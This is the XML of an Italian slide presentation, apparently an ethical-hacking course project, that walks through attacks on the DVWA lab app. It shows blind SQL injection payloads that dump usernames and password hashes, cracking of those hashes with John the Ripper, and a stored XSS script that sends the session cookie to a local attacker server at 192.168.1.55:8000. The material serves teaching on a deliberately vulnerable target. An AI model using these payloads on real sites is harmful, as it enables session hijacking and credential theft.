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03671bec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03671bec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78201ed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78201ed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78201edc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78201ed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78201ed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78201ed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78201edc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78201edc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78201edc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78201edc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78201ed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78201ed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78201edc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78201edc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03671bec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03671bec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93233" y="2930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9144000" cy="70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2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Progetto Cyber Security &amp; Ethical Hacking</a:t>
            </a:r>
            <a:endParaRPr sz="2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0950" y="2230075"/>
            <a:ext cx="3252600" cy="291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4132">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SQL injection Blind</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="413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563">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>I Blind SQL injection sono una variazione dei tradizionali attacchi SQL injection, nei quali le applicazioni web vulnerabili non rispondono alle richieste con le informazioni relative.</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="256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63">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Nei SQL injection, il database restituisce o i dati o un messaggio di errore a commento della query.</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="256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63">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Trattasi di Blind SQL injection se il database non fornisce dati alla pagina web che confermino direttamente la presenza di una vulnerabilità.</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="256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63">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>In questo caso l’attaccante ricorre ad una serie di richieste condizionali, alle quali il database risponde con ‘vero’ o ‘falso’. Sebbene, quindi, molte tecniche utilizzabili nelle SQL injection non siano efficaci, l’attaccante può sempre ottenere l’esfiltrazione di dati con qualche step in più</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="256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5599650" y="2247900"/>
            <a:ext cx="3544200" cy="28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1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>XSS Stored  (Cross-Site Scripting)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chemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>E' una vulnerabilità informatica in cui un aggressore inserisce codice JavaScript malevolo in un'applicazione web, che poi viene memorizzato o "stoccato" nel database dell'applicazione.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chemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Quando altri utenti accedono a pagine o contenuti contenenti questo codice dannoso, il browser li esegue involontariamente, consentendo all'attaccante di rubare informazioni sensibili, compromettere le sessioni degli utenti o effettuare altre azioni dannose.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000" y="689275"/>
            <a:ext cx="2143750" cy="1540800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw rotWithShape="0" algn="bl" dir="21540000" dist="19050">
              <a:schemeClr val="dk1">
                <a:alpha val="0"/>
              </a:schemeClr>
            </a:outerShdw>
          </a:effectLst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0" y="126450"/>
            <a:ext cx="4207800" cy="10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2971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1200"/>
              <a:t>Una volta effettuato l’accesso a DVWA ,andremo  a modificare il livello di sicurezza , si passerà da “high” ,di default,a “low”. In questo modo avremo meno controlli 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Successivamente ci sposteremo su Sql Injection (Blind) e inseriremo la query (screen 2)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923350" y="0"/>
            <a:ext cx="3906900" cy="121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2.                                   </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="it" sz="1050">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Query  'or 1=1 </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="it" sz="1050">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>#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it" sz="1050">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it" sz="1050">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Il testo ' OR 1=1 # è progettato per influenzare la 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logica della query.In questo modo, la query SQL sarà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manipolata in modo che la condizione sia sempre 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vera, ignorando qualsiasi altra condizione di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autenticazione. Di conseguenza, si riuscirà ad eludere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l'autenticazione e ad accedere a una nuova posizione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o risorsa che altrimenti sarebbe protetta.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="1" sz="341"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="64" name="Google Shape;64;p14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5579700" y="2955750"/>
            <a:ext cx="3564300" cy="18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7944" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="268875" y="1327000"/>
            <a:ext cx="3938975" cy="371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-1688" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4956775" y="1327000"/>
            <a:ext cx="3938976" cy="37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192525" y="185200"/>
            <a:ext cx="3906900" cy="10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3.    OR 1=1 UNION SELECT user, password FROM users#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Facendo riferimento alla query precedente, ho formulato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un' altro comando SQL. In modo da poter estrapolare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username e password che andrò ad utilizzare nella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parte successiva.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5077175" y="0"/>
            <a:ext cx="3906900" cy="121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4.     john --format=raw-md5 codici.txt –show.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Ho inserito tutti gli hash con relativi usernames in un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file.txt e tramite </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it" sz="1050">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>John</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it" sz="1050">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> the Ripper ho decodificato gli hash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   in regolari password.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1050">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>     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="1" sz="341"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="73" name="Google Shape;73;p15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5579700" y="2955750"/>
            <a:ext cx="3564300" cy="18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6600"/>
            <a:ext cx="3906900" cy="38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375" y="1276600"/>
            <a:ext cx="3979700" cy="38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031250" cy="250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0" l="0" r="21166" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6073738" y="2611200"/>
            <a:ext cx="3070276" cy="25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6">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="-2827"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="2539725"/>
            <a:ext cx="3031251" cy="26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0" l="0" r="0" t="-2838"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6073738" y="0"/>
            <a:ext cx="3070274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136050" y="885675"/>
            <a:ext cx="283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Adesso ci sposteremo su “BruteForce” e andremo a verificare l’autenticazione degli username e password che abbiamo estrapolato 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1250" y="1791800"/>
            <a:ext cx="3031252" cy="18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40125" y="0"/>
            <a:ext cx="91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XSS Stored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" y="1482375"/>
            <a:ext cx="4408307" cy="3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82375"/>
            <a:ext cx="4500800" cy="36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80250" y="312675"/>
            <a:ext cx="385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it" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> &lt;script&gt;alert(‘alex’);&lt;/script&gt;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  Adesso testeremo I'XSS digitando il seguente codice    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  HTML/JavaScript.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352200" y="400200"/>
            <a:ext cx="37206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2.         &lt;script&gt;alert(document.cookie); &lt;/script&gt;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Utilizzeremo il seguente codice JS per visualizzare il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valore del cookie corrente nel browser dell'utente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Come si può notare dallo screen avremo come output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  anche il livello di sicurezza.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40125" y="0"/>
            <a:ext cx="91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XSS Stored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80250" y="312675"/>
            <a:ext cx="385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it" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>python -m http.server 8000 &amp;&gt; log.txt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Questo comando ci permetterà di avviare un server HTTP locale sulla porta 8000 utilizzando Python e reindirizza sia lo stdout che lo stderr (output standard e output di errore) verso il file "log.txt".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775650" y="112600"/>
            <a:ext cx="42318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2.       &lt;script&gt;document.location='http://192.168.1.55:8000/?cookie='+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document.cookie; &lt;/script&gt;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Questo codice ci permetterà  di estrapolare il cookie e mandare il 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          tutto nel server locale che abbiamo creato in precedenza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0" y="1454100"/>
            <a:ext cx="3634649" cy="31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675" y="1454100"/>
            <a:ext cx="4231749" cy="35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0125" y="0"/>
            <a:ext cx="91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XSS Stored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73575" y="580225"/>
            <a:ext cx="386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È stato necessario estendere la capacità del campo "body" da 50 a 300 caratteri al fine di consentire l'inserimento completo del codice JavaScript. Questa modifica è stata effettuata a causa delle limitazioni originali del campo, che non permettevano l'inserimento accurato e completo del codice.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575" y="1272200"/>
            <a:ext cx="4515932" cy="3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40125" y="0"/>
            <a:ext cx="91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XSS Stored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0125" y="1370875"/>
            <a:ext cx="3566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In questo modo siamo riusciti ad ottenere i</a:t>
            </a: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cookie di sessione dell'utente ,come </a:t>
            </a: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 può vedere d</a:t>
            </a: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 screen in basso a destra.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i dati dei cookie di un utente, un potenziale aggressore potrebbe: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Monitorare le attività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Raccogliere informazioni personali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Effettuare l'accesso non autorizzato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Impersonare l'utente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P.S.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"Ho creato un file denominato 'log.txt' e ho configurato il codice Python in modo che l'output venga automaticamente registrato all'interno di questo file utilizzando il comando ' &amp;&gt; log.txt'."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75" y="815725"/>
            <a:ext cx="5471226" cy="42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 flipH="1">
            <a:off x="640825" y="2033325"/>
            <a:ext cx="1480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The End</a:t>
            </a:r>
            <a:endParaRPr sz="2400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184850" y="4457250"/>
            <a:ext cx="28023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Dott. Doddis Alex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